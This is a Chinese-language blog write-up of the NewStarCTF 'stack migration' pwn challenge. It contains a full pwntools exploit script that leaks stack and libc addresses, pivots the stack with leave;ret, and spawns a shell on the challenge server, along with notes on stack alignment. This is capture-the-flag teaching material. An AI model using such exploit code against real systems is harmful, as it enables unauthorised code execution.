

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="WangYiHao">
  <meta name="keywords" content="">
  
    <meta name="description" content="NewStarCTF---stack migration  我们可以先checksec一下：  拖入IDA中，查看反汇编代码：  给我们了一点小礼物%p,泄露buf的地址，也就是泄露一个栈上的地址，毕竟buf这玩意就在栈上，其实我们也能想到，溢出的地址是非常少的，所以我们得进行栈迁移，栈地址泄露了，又能向栈地址上写数据，所以我们考虑将栈迁移到泄露的地址上，payload如下： 1234567891">
<meta property="og:type" content="article">
<meta property="og:title" content="NewStarCTF---stack migration">
<meta property="og:url" content="http://example.com/2024/06/12/NewStarCTF-stack-migration/index.html">
<meta property="og:site_name" content="pwn二进制初研究">
<meta property="og:description" content="NewStarCTF---stack migration  我们可以先checksec一下：  拖入IDA中，查看反汇编代码：  给我们了一点小礼物%p,泄露buf的地址，也就是泄露一个栈上的地址，毕竟buf这玩意就在栈上，其实我们也能想到，溢出的地址是非常少的，所以我们得进行栈迁移，栈地址泄露了，又能向栈地址上写数据，所以我们考虑将栈迁移到泄露的地址上，payload如下： 1234567891">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2024/06/12/NewStarCTF-stack-migration/1.png">
<meta property="og:image" content="http://example.com/2024/06/12/NewStarCTF-stack-migration/2.png">
<meta property="og:image" content="http://example.com/2024/06/12/NewStarCTF-stack-migration/3.png">
<meta property="article:published_time" content="2024-06-12T05:26:33.000Z">
<meta property="article:modified_time" content="2024-06-20T10:01:10.541Z">
<meta property="article:author" content="WangYiHao">
<meta property="article:tag" content="栈迁移&amp;栈溢出">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/2024/06/12/NewStarCTF-stack-migration/1.png">
  
  
  
  <title>NewStarCTF---stack migration - pwn二进制初研究</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>博客标题</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="NewStarCTF---stack migration"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-06-12 13:26" pubdate>
          2024年6月12日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          548 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          5 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">NewStarCTF---stack migration</h1>
            
            
              <div class="markdown-body">
                
                <h1 align="center">NewStarCTF---stack migration</h1>

<p>我们可以先checksec一下：</p>
<p><img src="/2024/06/12/NewStarCTF-stack-migration/1.png" srcset="/img/loading.gif" lazyload alt="1"></p>
<p>拖入IDA中，查看反汇编代码：</p>
<p><img src="/2024/06/12/NewStarCTF-stack-migration/2.png" srcset="/img/loading.gif" lazyload alt="2"></p>
<p>给我们了一点小礼物%p,泄露buf的地址，也就是泄露一个栈上的地址，毕竟buf这玩意就在栈上，其实我们也能想到，溢出的地址是非常少的，所以我们得进行栈迁移，栈地址泄露了，又能向栈地址上写数据，所以我们考虑将栈迁移到泄露的地址上，payload如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br>context.terminal = [<span class="hljs-string">&#x27;tmux&#x27;</span>,<span class="hljs-string">&#x27;splitw&#x27;</span>,<span class="hljs-string">&#x27;-h&#x27;</span>]<br>context.arch = <span class="hljs-string">&#x27;amd64&#x27;</span><br>elf = ELF(<span class="hljs-string">&quot;./pwn&quot;</span>)<br>libc = ELF(<span class="hljs-string">&quot;./libc.so.6&quot;</span>)<br>puts_got = elf.got[<span class="hljs-string">&quot;puts&quot;</span>]<br>puts_plt = elf.plt[<span class="hljs-string">&quot;puts&quot;</span>]<br>ret_addr = <span class="hljs-number">0x40101a</span> <br><br>leave_ret = <span class="hljs-number">0x4012AA</span><br><span class="hljs-comment">#sh = gdb.debug(&quot;./pwn&quot;,&quot;b *0x401230&quot;)</span><br>sh = remote(<span class="hljs-string">&quot;node5.buuoj.cn&quot;</span>,<span class="hljs-number">28301</span>)<br><br>pop_rdi_ret = <span class="hljs-number">0x401333</span><br><span class="hljs-comment">#sh = process(&quot;./pwn&quot;)</span><br><br><span class="hljs-comment">#pause()</span><br>payload = p64(pop_rdi_ret)<br>sh.send(payload)<br>sh.recvuntil(<span class="hljs-string">&quot;I have a small gift for you: &quot;</span>)<br>stack_addr = sh.recv(<span class="hljs-number">14</span>)<br>stack_addr = <span class="hljs-built_in">int</span>(stack_addr,<span class="hljs-number">16</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">type</span>(stack_addr))<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;stack_addr---------&gt;&quot;</span>,<span class="hljs-built_in">hex</span>(stack_addr))<br><br><span class="hljs-comment">#pause()</span><br>payload_1 = p64(puts_got) + p64(puts_plt) + p64(<span class="hljs-number">0x4011FF</span>) + <span class="hljs-string">b&quot;A&quot;</span>*(<span class="hljs-number">0x38</span>) + p64(stack_addr-<span class="hljs-number">0x8</span>) + p64(leave_ret)<br>sh.send(payload_1)<br>sh.recvuntil(<span class="hljs-string">&quot;maybe I&#x27;ll see you soon!\n&quot;</span>)<br>puts_addr = u64(sh.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b&quot;\x00&quot;</span>))<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;puts_addr---------&gt;&quot;</span>,<span class="hljs-built_in">hex</span>(puts_addr))<br><br>libc_base = puts_addr - libc.symbols[<span class="hljs-string">&quot;puts&quot;</span>]<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;libc_base---------&gt;&quot;</span>,<span class="hljs-built_in">hex</span>(libc_base))<br>system_addr = libc_base + libc.symbols[<span class="hljs-string">&quot;system&quot;</span>]<br>bin_sh_addr = libc_base + <span class="hljs-built_in">next</span>(libc.search(<span class="hljs-string">b&quot;/bin/sh\x00&quot;</span>))<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;system_addr---------&gt;&quot;</span>,<span class="hljs-built_in">hex</span>(system_addr))<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;bin_sh_addr---------&gt;&quot;</span>,<span class="hljs-built_in">hex</span>(bin_sh_addr))<br><br>stack_addr_1 = stack_addr - <span class="hljs-number">0x40</span><br><span class="hljs-comment">#pause()</span><br>sh.send(p64(pop_rdi_ret))<br><br><span class="hljs-comment">#pause()</span><br>payload_2 = p64(bin_sh_addr) + p64(ret_addr)+ p64(system_addr) + <span class="hljs-string">b&quot;A&quot;</span>*(<span class="hljs-number">0x38</span>) + p64(stack_addr_1-<span class="hljs-number">0x8</span>) + p64(leave_ret) <br>sh.send(payload_2)<br>sh.interactive()<br><br></code></pre></td></tr></table></figure>

<p>接下来，我们来解释一下payload，第一次发送8个字节p64(pop_rdi_ret)，然后收到泄露的buf地址，第二次发送0x60个字节，将栈迁移(esp寄存器)到stack_addr(buf在栈上的地址)，同时继续布置栈，让程序泄露puts函数的真实地址，并再次返回到主函数，此时栈的布局为：</p>
<p><img src="/2024/06/12/NewStarCTF-stack-migration/3.png" srcset="/img/loading.gif" lazyload alt="3"></p>
<p>然后，按照上面的方法，如法炮制一边，就可以，成功的getshell了。</p>
<p>值得注意的是：</p>
<figure class="highlight gcode"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gcode">payload_<span class="hljs-number">2</span> = p<span class="hljs-number">64</span><span class="hljs-comment">(bin_sh_addr)</span> + p<span class="hljs-number">64</span><span class="hljs-comment">(ret_addr)</span>+ p<span class="hljs-number">64</span><span class="hljs-comment">(system_addr)</span> + b<span class="hljs-string">&quot;A&quot;</span>*<span class="hljs-comment">(0x38)</span> + p<span class="hljs-number">64</span><span class="hljs-comment">(stack_addr_1-0x8)</span> + p<span class="hljs-number">64</span><span class="hljs-comment">(leave_ret)</span> <br></code></pre></td></tr></table></figure>

<figure class="highlight gcode"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gcode">payload_<span class="hljs-number">2</span> = p<span class="hljs-number">64</span><span class="hljs-comment">(bin_sh_addr)</span> + p<span class="hljs-number">64</span><span class="hljs-comment">(system_addr)</span> + b<span class="hljs-string">&quot;A&quot;</span>*<span class="hljs-comment">(0x38+0x8)</span> + p<span class="hljs-number">64</span><span class="hljs-comment">(stack_addr_1-0x8)</span> + p<span class="hljs-number">64</span><span class="hljs-comment">(leave_ret)</span> <br></code></pre></td></tr></table></figure>

<p>不能写成下面那个样子，虽然说也没毛病，但是应该是栈对齐的问题，这一点真的是折磨我了，踩了个大坑。</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E6%A0%88%E8%BF%81%E7%A7%BB-%E6%A0%88%E6%BA%A2%E5%87%BA/" class="print-no-link">#栈迁移&栈溢出</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>NewStarCTF---stack migration</div>
      <div>http://example.com/2024/06/12/NewStarCTF-stack-migration/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>WangYiHao</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年6月12日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/06/15/%E4%B8%80%E9%81%93%E9%A2%98%E8%AF%B4%E6%98%8Ecall-system-%E4%B8%8Esystem-plt%E8%B0%83%E7%94%A8%E7%9A%84%E5%8C%BA%E5%88%AB/" title="一道题说明call system 与system plt调用的区别">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">一道题说明call system 与system plt调用的区别</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/06/11/srop%E5%88%A9%E7%94%A8/" title="srop利用">
                        <span class="hidden-mobile">srop利用</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
